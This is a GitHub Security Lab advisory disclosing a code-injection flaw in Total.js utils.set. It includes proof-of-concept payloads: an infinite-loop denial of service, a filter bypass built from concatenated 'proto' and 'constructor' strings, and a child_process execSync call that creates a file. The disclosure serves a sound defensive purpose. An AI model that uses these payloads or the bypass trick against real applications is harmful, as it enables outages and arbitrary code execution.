skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
July 21, 2021

GHSL-2021-066: DoS and RCE in totaljs

GitHub Security Lab

Coordinated Disclosure Timeline

Product

Total.js

Tested Version

Latest version available on npm 3.4.8.

Details

Calling the utils.set function with user-controlled values leads to code-injection.

Impact

An attacker can execute abitrary javascript code in the context of node.

Resources

Proof of concept: Denial of service

The PoC causes a DoS by going into an infinite loop.

var utils = require('total.js/utils');
utils.set({},'a;Function(`while(1)1;`)();//'); 

// Alternatively if "Function" is sanitized (similar to how "eval is currently sanitized), then the below will still work: 
utils.set({},'f[`__` + `proto__`][`cons` + `tructor`][`cons` + `tructor`](`while(1)1;`)();//')

Proof of concept: Code execution

This PoC creates a file GHSL inside the current working directory.

var utils = require('total.js/utils');
utils.set({},'a;Function(`require("child_process")\\x2eexecSync("touch GHSL")`)();//')

CVE

Resources

Credit

This issue was discovered by @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-066 in any communication regarding this issue.